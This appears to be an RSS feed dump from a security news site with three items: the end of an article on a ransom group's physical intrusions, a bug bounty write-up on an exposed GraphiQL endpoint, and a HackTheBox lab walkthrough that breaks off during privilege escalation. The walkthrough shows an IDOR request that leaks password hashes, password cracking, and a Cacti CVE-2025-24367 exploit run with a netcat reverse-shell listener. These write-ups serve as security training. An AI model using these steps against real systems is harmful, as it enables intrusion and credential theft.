<p>Spitzner added, “security awareness training is one approach to patching vulnerabilities in humans. You need to teach them about the risks of infected or untrusted USB drives and what drives are authorized.  In this case, the problem may have been an untrusted individual gaining access to the victim’s facilities.”</p>



<p><a href="https://www.linkedin.com/in/nicholas-tausek-6ab41611/" target="_blank" rel="noreferrer noopener">Nick Tausek</a>, lead security automation architect at Swimlane, said the Silent Ransom Group’s attack strategy of leaning into trust says a lot about where extortion is heading. “That makes this especially dangerous for law firms,” he said. “Those environments hold sensitive client records, privileged communications, financial details, and case information. If that data is stolen, the damage does not stop at the victim organization. Clients can be pressured, legal strategies can be exposed, and employees can become targets for follow-up scams.”</p>



<p>The hardest part is that much of this activity can look normal at first glance, he said. Because legitimate tools used by threat actors don’t always trigger alarms, security teams need faster ways to connect unusual behavior across users, devices, cloud storage, and remote access sessions. “When attackers are moving this quickly, delayed detection gives them the advantage,” he said.</p>



<p>Grimes added that defenses should include strong and frequent employee education about physical attacks, disabling USB ports on publicly accessible computers, and other mitigations that prevent the connection of physical storage devices. Microsoft Windows, he pointed out, has had mitigations to prevent the insertion of unauthorized storage devices, including USB sticks, for well over a decade.</p>



<p>In addition, the FBI urges physical and IT security leaders to verify the credentials of anyone accessing company spaces, obtaining copies of each visitor’s ID card, as well as limiting access to sensitive data from less secure networks, such as home computers or the public internet, and developing and communicating policies regarding when and how IT support will communicate and authenticate themselves to employees.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rejected but Rewarded — What a GraphQL Misconfiguration Taught Me About Bug Bounty Triage.]]></title>
<description><![CDATA[By kjuliusResponsible disclosure submitted. No mutations were executed. No systems were harmed. Finding classified as Informative. 50 CHF bonus awarded.Introduction.Not every bug bounty story ends with a payout and a hall of fame mention.Some end with a rejection, a lesson, and — if you’re lucky ...]]></description>
<link>https://tsecurity.de/de/3545222/hacking/rejected-but-rewarded-what-a-graphql-misconfiguration-taught-me-about-bug-bounty-triage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545222/hacking/rejected-but-rewarded-what-a-graphql-misconfiguration-taught-me-about-bug-bounty-triage/</guid>
<pubDate>Mon, 25 May 2026 11:20:42 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8WbKge3Hl7kobioGWlxrFw.png"><figcaption>By kjulius</figcaption></figure><p><em>Responsible disclosure submitted. No mutations were executed. No systems were harmed. Finding classified as Informative. 50 CHF bonus awarded.</em></p><h3>Introduction.</h3><p>Not every bug bounty story ends with a payout and a hall of fame mention.</p><p>Some end with a rejection, a lesson, and — if you’re lucky — a small bonus that tells you the triage team saw something worth acknowledging even if they couldn’t justify a full reward.</p><p>This is one of those stories.</p><p>I found what I genuinely believed was a Critical severity finding on a major operational platform. I documented it carefully, scored it at CVSS 9.1, mapped it to four OWASP API Top 10 categories, wrote a full responsible disclosure report, and submitted it through a Swiss Bug Bounty platform.</p><p>The triage team came back and marked it <strong>Rejected (Informative)</strong>.</p><p>They were right. And here is exactly what happened, what I missed, and what every bug bounty hunter needs to understand about the difference between a misconfiguration and an exploitable vulnerability.</p><h3>How I Found It — URL Fuzzing.</h3><p>It started with a wordlist and a tool most bug bounty hunters keep in their back pocket.</p><p>I was fuzzing subdomains and paths on target.com using a standard GraphQL-focused wordlist. The paths I was testing included:</p><pre>/graphql<br>/graphiql<br>/graphiql?path=/graphql<br>/api/graphql<br>/v1/graphql<br>/playground</pre><p>When I hit subdomain.target.com with /graphiql?path=/graphql, the server returned a clean <strong>200 OK</strong> and loaded a fully functional GraphiQL IDE — no login, no token, no challenge.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2cUymUfynv6yIKGqip7LvQ.png"><figcaption>PoC Image.</figcaption></figure><p>GraphiQL is a browser-based developer tool for writing and testing GraphQL queries. It is never supposed to be publicly accessible. Seeing it load on an internet-facing subdomain with zero authentication was the first signal that something was misconfigured.</p><h3>Building the Evidence — Step by Step.</h3><h4>“Confirming Live Access”.</h4><p>My first query was simple — confirm the endpoint is live and check what role I had:</p><pre>{<br>  role<br>  lastUpdate<br>  globalMessage<br>}</pre><p>Response:</p><pre>{<br>  "data": {<br>    "role": "ANONYMOUS",<br>    "lastUpdate": "2026-05-19T00:00:01Z",<br>    "globalMessage": ""<br>  }<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fK2BH9_POI8C0QviRekK7Q.png"><figcaption>PoC Image.</figcaption></figure><p>Three immediate observations:</p><ul><li>role: ANONYMOUS — no authentication, yet the API responds.</li><li>lastUpdate showed the exact day’s date— that was a <strong>live production system.</strong></li><li>A global message system exists, currently empty.</li></ul><h4>“Introspection Was On”.</h4><p>I ran the standard introspection query to dump the schema:</p><pre>{<br>  __schema {<br>    types {<br>      name<br>      kind<br>    }<br>  }<br>}</pre><p>The full type system came back — including something that made me sit up straight:</p><p>A Mutation type. Write operations. Accessible anonymously.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5FBhK0vTRSSZGDI_dX82Bg.png"><figcaption>PoC Image.</figcaption></figure><h4>“The Mutations”.</h4><p>I enumerated the mutation type:</p><pre>{<br>  __schema {<br>    mutationType {<br>      fields {<br>        name<br>        description<br>        args { <br>        name <br>        type { name kind ofType { name kind } } <br>        }<br>      }<br>    }<br>  }<br>}</pre><p>Three mutations came back:</p><p>deleteGlobalMessage :Deletes the global message shown to all users.</p><p>updateGlobalMessage:Updates the global message for all users.</p><p>updateTrack :Updates state and duration of a track.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*01DsI49ft2oUjLOcnhiMpw.png"><figcaption>PoC Image.</figcaption></figure><p>On paper this looked devastating. An unauthenticated user could theoretically push fake messages to all visitors or close attractions remotely. I scored it CVSS 9.1, mapped it to OWASP API2, API5, and API8, and filed the report.</p><h4>“Live Operational Data”.</h4><p>I also pulled real-time data from the tracks query — four operational attractions, all open, zero wait times, live timestamps. The system was clearly active and serving real visitors.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Kv4uoz6qHTojXhCVRJJdXw.png"><figcaption>PoC Image.</figcaption></figure><h3>The Rejection — And Why the Triage Team Was Right.</h3><p>The triage team came back with this response:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EVGjwyXuaPPJixV_EYC_Dw.png"><figcaption>PoC Image.</figcaption></figure><p>They attached a screenshot showing the actual mutation response:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oxqL1OC1po0tL3nQQywnIA.png"><figcaption>PoC Image.</figcaption></figure><p>The mutations were <strong>visible in the schema but protected server-side</strong>. The GraphQL resolvers had authorization checks — the ANONYMOUS role simply could not execute them.</p><p>This is the key distinction I missed:</p><blockquote><strong><em>Schema visibility ≠ exploitability.</em></strong></blockquote><p>Just because a mutation appears in the GraphQL schema does not mean it is executable. The schema tells you what operations exist. The resolvers decide who can run them. In this case, the server correctly rejected anonymous mutation attempts.</p><h3>What I Got Wrong.</h3><h4>1. I Assumed Schema = Access.</h4><p>The presence of updateGlobalMessage in the schema led me to assume it was accessible. I never actually tried to execute it. If I had, I would have seen the UNAUTHORIZED error immediately and adjusted my severity assessment before filing.</p><p><strong>Lesson:</strong> Always attempt to execute mutations in a safe, non-destructive way before assessing impact. A schema entry is a hint, not a guarantee.</p><h4>2. I Over-Scored the CVSS.</h4><p>My CVSS of 9.1 assumed Integrity: High and Availability: High based on the theoretical ability to modify tracks and push messages. Without confirmed execution, those scores were not justified.</p><p><strong>Lesson:</strong> CVSS scores should reflect <strong>demonstrated</strong> impact, not theoretical impact based on schema visibility alone.</p><h4>3. I Confused Misconfiguration with Exploitability.</h4><p>GraphiQL being exposed and introspection being enabled are genuine misconfigurations. But misconfigurations without exploitable impact often land as Informative on bug bounty platforms — especially ones that explicitly require CIA impact.</p><p><strong>Lesson:</strong> Know the platform’s acceptance criteria before filing. This particular Swiss platform explicitly requires demonstrable CIA security impact. Misconfiguration alone rarely meets that bar.</p><h3>What Was Still Valid.</h3><p>To be fair to myself, two issues remain genuinely valid even after the triage response:</p><p><strong>1. Introspection enabled in production.</strong></p><p>Introspection gives attackers a complete API blueprint — all types, mutations, input structures, and enum values — without any credentials. This is explicitly flagged in OWASP API8:2023 and recommended against by Apollo, the GraphQL Foundation, and every major security framework. It is a real misconfiguration even if it did not lead to direct exploitation here.</p><p><strong>2. GraphiQL publicly accessible.</strong></p><p>A developer IDE should never be internet-facing. Its presence reveals the technology stack, endpoint structure, and internal API design to any anonymous visitor. This is a real finding even if it is not bounty-worthy on its own.</p><p>The triage team acknowledged both points by awarding a <strong>50 CHF courtesy bonus</strong> — which was a fair and professional response.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*JPIGqaX-q1zBSL2efE9jcQ.png"><figcaption>PoC Image.</figcaption></figure><h3>The 50 CHF Lesson.</h3><p>Getting 50 CHF for a rejected finding might feel like a consolation prize. But think about what it actually means:</p><ul><li>The triage team saw genuine effort and good-faith research.</li><li>The misconfigurations were real even if not exploitable.</li><li>The responsible disclosure report was well-structured and professional.</li><li>The finding gave them complementary insights about their own exposure.</li></ul><p>That is not nothing. In bug bounty, how you report matters as much as what you report. A well-written Informative is better for your reputation than a poorly written Critical.</p><h3>Conclusion.</h3><p>This finding did not pay out the way I expected. The CVSS 9.1 became an Informative. The Critical badge became a courtesy bonus.</p><p>But it taught me more about bug bounty triage than most accepted findings would have. The difference between a misconfiguration and an exploitable vulnerability is exactly the kind of nuance that separates good researchers from great ones.</p><p>Schema visibility is not access. Theoretical impact is not demonstrated impact. And a rejection with a lesson is worth more than an easy acceptance that teaches you nothing.</p><p>The endpoint is still out there. The introspection is still on. The GraphiQL is still exposed.</p><p>Next time I’ll test the mutation before I file the report.</p><h3>💬 <strong>Before You Go.</strong></h3><p><em>Note, this article was written after responsible disclosure was submitted and triaged by the affected organization. The target name has been intentionally omitted. All findings are based on passive reconnaissance and read-only queries. No systems were modified, no data was exfiltrated, and no harm was caused.</em></p><p><em>If you are a security researcher, always practise responsible disclosure. If you are a developer, disable GraphiQL and introspection in production.</em></p><p><em>If this writeup helped you learn something new, drop a few claps and follow me for more bug bounty stories, security research, and the occasional rejection that teaches more than a payout ever could. See you in the next writeup, peace… 🙏</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=a69a9f42e12c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/rejected-but-rewarded-what-a-graphql-misconfiguration-taught-me-about-bug-bounty-triage-a69a9f42e12c">Rejected but Rewarded — What a GraphQL Misconfiguration Taught Me About Bug Bounty Triage.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MonitorsFour HTB — HackTheBox Walkthrough | By Alham Rizvi]]></title>
<description><![CDATA[Hello everyone, This is Alham Rizvi again, finally this machine is retired and here is my writeup for it, So let’s get started. Before we begin, make sure to follow me on my socials for more HTB writeups, CTF content, and cybersecurity stuff.Hello everyone, finally this machine is retired and her...]]></description>
<link>https://tsecurity.de/de/3545221/hacking/monitorsfour-htb-hackthebox-walkthrough-by-alham-rizvi/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545221/hacking/monitorsfour-htb-hackthebox-walkthrough-by-alham-rizvi/</guid>
<pubDate>Mon, 25 May 2026 11:20:41 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wBiA6IHD8JiiAUOk562JbA.png"></figure><p>Hello everyone, This is Alham Rizvi again, finally this machine is retired and here is my writeup for it, So let’s get started. Before we begin, make sure to follow me on my socials for more HTB writeups, CTF content, and cybersecurity stuff.Hello everyone, finally this machine is retired and here is my writeup for it.</p><h3>Attack Chain</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/658/1*bZ5AOtrv1owIlK0FUzTzgA.png"></figure><h3>Reconaissance</h3><h4>Port scanning</h4><p>We start with classic recon by performing a full port scan. The goal here is to identify exposed services and understand the attack surface before interacting with the target further.</p><pre>alhamrizvi@alhams-fedora:~/mf$ sudo nmap -sS -sV 10.129.1.102 -oN out.txt<br>[sudo] password for alhamrizvi:<br>...<br><br>80/tcp   open  http    nginx<br>5985/tcp open  http    Microsoft HTTPAPI httpd 2.0<br>...<br>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<br>Nmap done: 1 IP address (1 host up) scanned in 111.67 seconds</pre><p>Port 80 hosts the web application behind Nginx, while port 5985 exposes WinRM, indicating the backend system is Windows. The presence of a PHPSESSID cookie also suggests the site is using PHP sessions.</p><p>Since the main website appeared mostly static, the next step was searching for hidden subdomains, as internal panels and monitoring applications are commonly hosted separately.</p><h4>Subdomain Discovery</h4><pre>alhamrizvi@alhams-fedora:~/mf$ ffuf -w /usr/share/seclists/subdomains-top1million-5000.txt \<br>-u http://monitorsfour.htb \<br>-H "Host: FUZZ.monitorsfour.htb"<br>...<br><br>cacti     [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 121 ms]<br>...</pre><p>The scan returned a valid subdomain,</p><p>This revealed cacti.monitorsfour.htb, which is running Cacti, a network monitoring platform known for several historical vulnerabilities including authentication bypasses and RCE issues.</p><p>To access it locally, we add the subdomain to /etc/hosts:</p><pre>echo "10.129.12.34 cacti.monitorsfour.htb" | sudo tee -a /etc/hosts</pre><h4>Web Enumeration</h4><pre>alhamrizvi@alhams-fedora:~/mf$ # <br>curl -sL -v http://cacti.monitorsfour.htb/ 2&gt;&amp;1 | head -40<br><br>curl -sL http://cacti.monitorsfour.htb/cacti/ | grep -i "version\|cacti"<br><br>curl -sL http://cacti.monitorsfour.htb/cacti/index.php | grep -i "version"<br>* Host cacti.monitorsfour.htb:80 was resolved.<br>* IPv6: (none)<br>* IPv4: 10.129.52.140, 10.129.1.102<br>*   Trying 10.129.52.140:80...<br>* connect to 10.129.52.140 port 80 from 10.10.14.98 port 38536 failed: No route to host<br>*   Trying 10.129.1.102:80...<br>* Connected to cacti.monitorsfour.htb (10.129.1.102) port 80<br>* using HTTP/1.x<br>&gt; GET / HTTP/1.1<br>&gt; Host: cacti.monitorsfour.htb<br>&gt; User-Agent: curl/8.15.0<br>&gt; Accept: */*<br>&gt; <br>* Request completely sent off<br>&lt; HTTP/1.1 302 Found<br>&lt; Server: nginx<br>&lt; Date: Thu, 21 May 2026 04:55:29 GMT<br>&lt; Content-Type: text/html; charset=UTF-8<br>&lt; Transfer-Encoding: chunked<br>&lt; Connection: keep-alive<br>&lt; X-Powered-By: PHP/8.3.27<br>&lt; Location: /cacti<br>* Ignoring the response-body<br>&lt; <br>* Connection #0 to host cacti.monitorsfour.htb left intact<br>* Issue another request to this URL: 'http://cacti.monitorsfour.htb/cacti'<br>* Re-using existing http: connection with host cacti.monitorsfour.htb<br>&gt; GET /cacti HTTP/1.1<br>&gt; Host: cacti.monitorsfour.htb<br>&gt; User-Agent: curl/8.15.0<br>&gt; Accept: */*<br>&gt; <br>* Request completely sent off<br>&lt; HTTP/1.1 301 Moved Permanently<br>&lt; Server: nginx<br>&lt; Date: Thu, 21 May 2026 04:55:30 GMT<br>&lt; Content-Type: text/html<br>&lt; Content-Length: 162<br>&lt; Location: http://cacti.monitorsfour.htb/cacti/<br>&lt; Connection: keep-alive<br> &lt;title&gt;Login to Cacti&lt;/title&gt;<br>  var cactiConsoleAllowed=false;<br>  var cactiGraphsAllowed=false;<br>  var cactiHome='Cacti Home';<br>  var cactiConsole='Console';<br>  var cactiMisc='Miscellaneous';<br>  var cactiDashboards='Dashboards';<br>  var cactiGeneral='General';<br>  var cactiCharts='Charts';<br>  var cactiProjectPage='Cacti Project Page';<br>  var cactiCommunityForum='User Community';<br>  var cactiUser='User';<br>  var cactiDocumentation='Documentation';<br>  var cactiSpine='Spine';<br>  var cactiRRDProxy='RRDProxy';<br>  var cactiKeyboard='Keyboard';<br>  var cactiShortcuts='Shortcuts';<br>  var cactiContributeTo='Contribute to the Cacti Project';<br>  var cactiDevHelp='Help in Developing';<br>  var cactiDonate='Donation &amp;amp; Sponsoring';<br>  var cactiProfile='Profile';<br>  var cactiTheme='Theme';<br>  var cactiClient='Client';<br>  var cactiTranslate='Help in Translating';<br>  var aboutCacti='About Cacti';<br>  var justCacti='Cacti';<br> &lt;link href='/cacti/include/themes/modern/images/favicon.ico' rel='shortcut icon'&gt;<br> &lt;link href='/cacti/include/themes/modern/images/cacti_logo.gif' rel='icon' sizes='96x96'&gt;<br> &lt;link href='/cacti/include/themes/modern/jquery.zoom.css?aca45860e0c75f2c485ddfc17160d597' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/jquery-ui.css?a51f0bd06d47bdcf4d6563ca44ac7c6d' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/default/style.css?bfe1c8d80ca469731f471745268ea146' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/jquery.multiselect.css?f83e570ae998a2a6f7b07f850c58ce8b' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/jquery.multiselect.filter.css?bdc527651975f5ccfb3fd6f91af0bb93' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/jquery.timepicker.css?431ab7d4ef48afd9c39a647c5c990b0a' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/jquery.colorpicker.css?24366e47db1fb3b58658a53d9a445214' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/billboard.css?695c0029bc6c0f91e299c84485669130' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/pace.css?cca67d465b4ea3986786a0679604a367' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/Diff.css?49e6953c7461abf91ec4e7346d34bd85' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/fa/css/all.css?02e393dfbbce98f9ae76cddc7ea21e52' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/vendor/flag-icons/css/flag-icons.css?ab806eafe572d8149eb3dba8d0283db7' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/main.css?89dc22c5a1bc9af4ae7b7ae5e9d6e4d1' type='text/css' rel='stylesheet'&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/screenfull.js?60a2ad1d452950179fa4d2c5d1b5dee4' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.js?d16de7de202afe54100a95dea1d4b134'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery-ui.js?bb9963f8eb6cb3e33d6f59112ddb2231'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.ui.touch.punch.js?4195aad6f616651c00557e84c6721646' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.cookie.js?0b804d4f90de70b032a9986b22165b75'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/js.storage.js?32df3a56e44d570b7e3177d71e892214'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jstree.js?5d3a3b5f68b0163175e5630a5e8a3a66'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.hotkeys.js?fbf82bcab286e9fc5cdf863eb067230f' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.tablednd.js?a33b14ebf8ce2abf7911e62cbc19e0c5' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.zoom.js?a4dcf91fed1e4be77b91d1569f4802dc' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.multiselect.js?0fe69963a69cd6e5c87eb380112912bb'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.multiselect.filter.js?ccf700b33985626742e26c6707028bed'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.timepicker.js?f29132ab24085f909242175ad11cfcbc'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.colorpicker.js?3b7032780b24b9b48050e5d245a36260' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.tablesorter.js?8d331985e11cfc65649a915073cb30ed'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.tablesorter.widgets.js?3cc0d7b3426e1db1e4a099db18b17e3c' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.tablesorter.pager.js?8ca32d30195c98492cd028f582f07c8c' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.sparkline.js?c7638b825bc7deb1cf58c990825d35b2' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/Chart.js?3367829189a65fe699f677e0e4605499' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/dygraph-combined.js?b5b448f71f8c3eb4a39506299bd81b0c' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/d3.js?90b69efc9897253561ab62038cd15692'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/billboard.js?9e6056e4dff4d132adc417d1b60c4af5'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/layout.js?666a6d4acff74d80292c7cce8bb1f138'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/pace.js?0232dc2b5854db23a93fd46af0f3bff7'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/purify.js?a99712dc2d4399aff979d801bfe65383'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/realtime.js?487d4e7f58ab491e660fe5209f67eb81'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/themes/modern/main.js?0eb4f9ce093f3c37be9e898793037ccc'&gt;&lt;/script&gt;<br>&lt;script type="text/javascript"&gt;if (top != self) {top.location.href = self.location.href;}&lt;/script&gt;&lt;script type="text/javascript"&gt;var csrfMagicToken = "sid:485055783bd3a989bf24668b6f5e345a3f02b1e2,1779339335;ip:a176cb5a056547ee31136d7acb8e3239864807ea,1779339335";var csrfMagicName = "__csrf_magic";&lt;/script&gt;&lt;script src="/cacti/include/vendor/csrf/csrf-magic.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/head&gt;<br>  &lt;div class='cactiLoginLogo'&gt;&lt;/div&gt;<br>    &lt;div class='cactiLogin'&gt;<br>     &lt;table class='cactiLoginTable'&gt;<br>  &lt;div class='versionInfo'&gt;Version 1.2.28 | (c) 2004-2026 - The Cacti Group&lt;/div&gt;<br> var cactiVersion='1.2.28';<br> var cactiServerOS='unix';<br> var cactiAction='';<br> var refreshPage='/cacti/logout.php?action=timeout';<br> var urlPath='/cacti/';<br>  &lt;div class='versionInfo'&gt;Version 1.2.28 | (c) 2004-2026 - The Cacti Group&lt;/div&gt;<br> var cactiVersion='1.2.28';<br>alhamrizvi@alhams-fedora:~/mf$</pre><p>The output shows that the web server redirects requests from the root path / to /cacti/, confirming that the actual application is hosted inside that directory.</p><pre>HTTP/1.1 302 Found<br>Location: /cacti</pre><p>Then another redirect occurs:</p><pre>HTTP/1.1 301 Moved Permanently<br>Location: http://cacti.monitorsfour.htb/cacti/</pre><p>After following the redirects, the response reveals the Cacti login page. The HTML and JavaScript references confirm the application is Cacti through multiple paths such as:</p><pre>/cacti/include/themes/<br>/cacti/include/js/</pre><p>The most important part of the output is the version disclosure:</p><pre>Version 1.2.28<br>var cactiVersion='1.2.28';</pre><p>This confirms the target is running Cacti version 1.2.28, which is useful for identifying known vulnerabilities and matching public exploits to the correct version.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/552/1*VSzzTUAZumBHeFs0_RrSvA.png"></figure><h4>Fuzzing</h4><p>To look for hidden functionality on the main website, directory and API endpoint fuzzing was performed.</p><pre>alhamrizvi@alhams-fedora:~/mf$ ffuf -w /usr/share/seclists/Discovery/Web-Content/api/api.txt \<br>-u http://monitorsfour.htb/FUZZ</pre><p>The scan discovered an endpoint named /user.</p><p>Testing the endpoint with different token values revealed insecure access control behavior. When the request used token=0, the application returned all user records instead of restricting access properly.</p><p>The response contained usernames and MD5 password hashes, indicating that the backend failed to validate the token correctly.</p><p>This behavior is characteristic of an IDOR vulnerability, where modifying user-controlled parameters allows access to unauthorized data.</p><p>The request sends token=0 to the /user endpoint.</p><pre>alhamrizvi@alhams-fedora:~/mf$ curl -sLv "http://monitorsfour.htb/user?token=0"<br><br>...<br>...<br><br>[<br>  {<br>    "id": 2,<br>    "username": "admin",<br>    "email": "admin@monitorsfour.htb",<br>    "password": "56b32eb43e6f15395f6c46c1c9e1cd36",<br>    "role": "super user",<br>    "token": "8024b78f83f102da4f",<br>    "name": "Marcus Higgins",<br>    "position": "System Administrator"<br>  },<br>  {<br>    "id": 5,<br>    "username": "mwatson",<br>    "email": "mwatson@monitorsfour.htb",<br>    "password": "69196959c16b26ef00b77d82cf6eb169",<br>    "role": "user",<br>    "name": "Michael Watson"<br>  },<br>  {<br>    "id": 6,<br>    "username": "janderson",<br>    "email": "janderson@monitorsfour.htb",<br>    "password": "2a22dcf99190c322d974c8df5ba3256b",<br>    "role": "user",<br>    "name": "Jennifer Anderson"<br>  },<br>  {<br>    "id": 7,<br>    "username": "dthompson",<br>    "email": "dthompson@monitorsfour.htb",<br>    "password": "8d4a7e7fd08555133e056d9aacb1e519",<br>    "role": "user",<br>    "name": "David Thompson"<br>  }<br>]<br></pre><h4>Password Cracking</h4><p>The leaked MD5 hashes were checked against CrackStation, an online hash lookup database containing precomputed password hashes.</p><p>The admin hash:</p><pre>56b32eb43e6f15395f6c46c1c9e1cd36</pre><p>was successfully cracked to:</p><pre>wonderful1</pre><p>Attempting to log into Cacti with admin:wonderful1 failed, which indicated that the username used by the web application differed from the exposed API username.</p><p>Based on the profile information returned earlier (Marcus Higgins), several username variations were tested until the correct credentials were identified:</p><pre>marcus:wonderful1</pre><p>This provided valid access to the Cacti panel.</p><h3>Initial Access</h3><p>After getting CACTI panel access, nothing seems interesting more than cacti panel’s version, we can try to get RCE with this CVE-2025–24367</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*geNDFGZlYdATDCubKIyv0Q.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ICu_8beIe88xqQbSvn9yvA.png"></figure><blockquote><strong>CVE-2025–24367 </strong>is a critical security vulnerability in Cacti, a popular open-source network monitoring and performance graphing framework. With a CVSS score of 8.7, it is classified as a post-authentication Remote Code Execution (RCE) flaw.</blockquote><blockquote><strong>How the Vulnerability Works ?</strong></blockquote><blockquote>The flaw occurs within Cacti’s RRDTool graph template functionality, where the system parses user-supplied data for RRD command parameters (like --right-axis-label).</blockquote><blockquote><strong>The Root Cause</strong>: While Cacti attempts to sanitize user input and escape shell metacharacters, it fails to handle newline characters (\( \backslash n \)) properly.</blockquote><blockquote><strong>The Exploit:</strong> An authenticated attacker can inject newline characters into the input parameters, breaking out of the intended command context. This argument injection allows the attacker to execute additional RRDTool commands and write arbitrary, malicious PHP code directly into the application’s web root.</blockquote><blockquote><strong>The Impact</strong>: Once the malicious PHP script is successfully created in the web root, the attacker can simply access it via a web browser or HTTP request to execute arbitrary system commands with the privileges of the web server.</blockquote><blockquote><strong>Affected Versions</strong></blockquote><blockquote>This vulnerability affects Cacti versions up to 1.2.28.</blockquote><p>After identifying valid credentials for the Cacti panel, I cloned a public PoC for CVE-2025–24367 and prepared a listener to catch the reverse shell.</p><pre>alhamrizvi@alhams-fedora:~/mf/CVE-2025-24367-Cacti-PoC$ sudo python3 exploit.py \<br>-url http://cacti.monitorsfour.htb \<br>-u marcus \<br>-p wonderful1 \<br>-i 10.10.14.98 \<br>-l 8000</pre><pre>nc -lvnp 8000</pre><p>The exploit successfully authenticated to the Cacti instance, generated temporary PHP payload files, and triggered command execution through the vulnerable functionality.</p><pre>[+] Cacti Instance Found!<br>[+] Serving HTTP on port 80<br>[+] Login Successful!<br>[+] Got graph ID: 226<br>[i] Created PHP filename: rKQT0.php<br>[+] Got payload: /bash<br>[i] Created PHP filename: 4bWsW.php<br>[+] Hit timeout, looks good for shell, check your listener!<br>[+] Stopped HTTP server on port 80</pre><p>Shortly after the timeout message appeared, the reverse shell connected back to the Netcat listener, giving remote code execution on the target container.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ whoami<br>www-data<br><br>www-data@821fbd6a43fa:~/html/cacti$ id<br>uid=33(www-data) gid=33(www-data) groups=33(www-data)<br>...<br><br>www-data@821fbd6a43fa:~/html/cacti$ cat /home/marcus/user.txt<br>REDACTED</pre><p>pRIVESC</p><h3>Finding the Docker API</h3><p>After getting a shell inside the Cacti container, I first verified the environment to understand where I was operating from.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ hostname<br>821fbd6a43fa</pre><p>The hostname looked like a container ID, which strongly suggested we were inside Docker. Checking the network configuration confirmed this:</p><pre>www-data@821fbd6a43fa:~/html/cacti$ ip addr<br>2: eth0@if6: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt;<br>    inet 172.18.0.2/16 brd 